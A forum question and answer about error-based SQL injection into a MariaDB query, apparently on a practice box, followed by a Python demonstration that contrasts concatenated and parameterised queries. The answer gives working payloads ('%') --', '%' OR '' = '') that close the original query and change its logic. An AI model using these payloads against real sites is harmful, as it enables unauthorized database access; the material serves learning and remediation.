How to find out the right syntax in MariaDB Error Based SQL Injection?
I am trying to inject SQL statements into a Box.
I have the following injection point:
example.com/?o=1&page=app
When I inject 1' I receive the following error message:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
I tried to inject the following:
1' ORDER BY 1 --
I still receive an error message, and I don't know how to close the statement:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ORDER BY 1 --') and ( dest like '5' or dest like '1' ORDER BY 1 --') LIMIT 10' at line 1
What am I doing wrong?
Thanks for your answers!
Given that when you tried 1' the query contained '1'', it seems the original query is something like:
... '5' or dest like '$o') LIMIT 10
For example:
SELECT * FROM table WHERE (category = '5' or dest like '$o') LIMIT 10
To make it a valid query, you need to close the bracket.
For example %') -- , giving:
SELECT * FROM table WHERE (category = '5' or dest like '%') --') LIMIT 10
Or %' OR '' = ' , giving:
SELECT * FROM table WHERE (category = '5' or dest like '%' OR '' = '') LIMIT 10
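Added example, not part of the original question or answer: the query shape reconstructed in the answer, built once by string concatenation and once with a bound parameter, run against the inputs quoted on this page. SQLite stands in for MariaDB so it runs offline; the table items, its columns, the sample rows and all function names are assumptions.

```python
import sqlite3

# Constructed sample data; table and column names are assumptions modelled
# on the query shape reconstructed in the answer.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, category TEXT, dest TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [(1, "5", "north"), (2, "7", "south"), (3, "9", "1")])
    return db

def search_concat(db, o):
    """'Before': the parameter is pasted into the SQL text."""
    sql = ("SELECT id FROM items WHERE (category = '5' OR dest LIKE '"
           + o + "') LIMIT 10")
    return [r[0] for r in db.execute(sql)]

def escape_like(value, esc="!"):
    """Neutralise LIKE wildcards so % and _ in input match literally."""
    for ch in (esc, "%", "_"):
        value = value.replace(ch, esc + ch)
    return value

def search_bound(db, o):
    """'After': the value is bound, so it cannot alter the query structure."""
    sql = ("SELECT id FROM items WHERE (category = '5' OR dest LIKE ? "
           "ESCAPE '!') LIMIT 10")
    return [r[0] for r in db.execute(sql, (escape_like(o),))]

def run(search, o):
    """Return rows, or a generic marker; the DB error text is not echoed back."""
    db = make_db()
    try:
        return search(db, o)
    except sqlite3.Error:
        return "error"

if __name__ == "__main__":
    # Inputs quoted on this page, plus the benign value 1.
    for o in ["1", "1'", "%') --", "%' OR '' = '"]:
        print(repr(o), run(search_concat, o), run(search_bound, o))
```

With the bound version every quoted input returns only the category = '5' row, and the caller sees a generic error instead of the database's DEBUG INFO text.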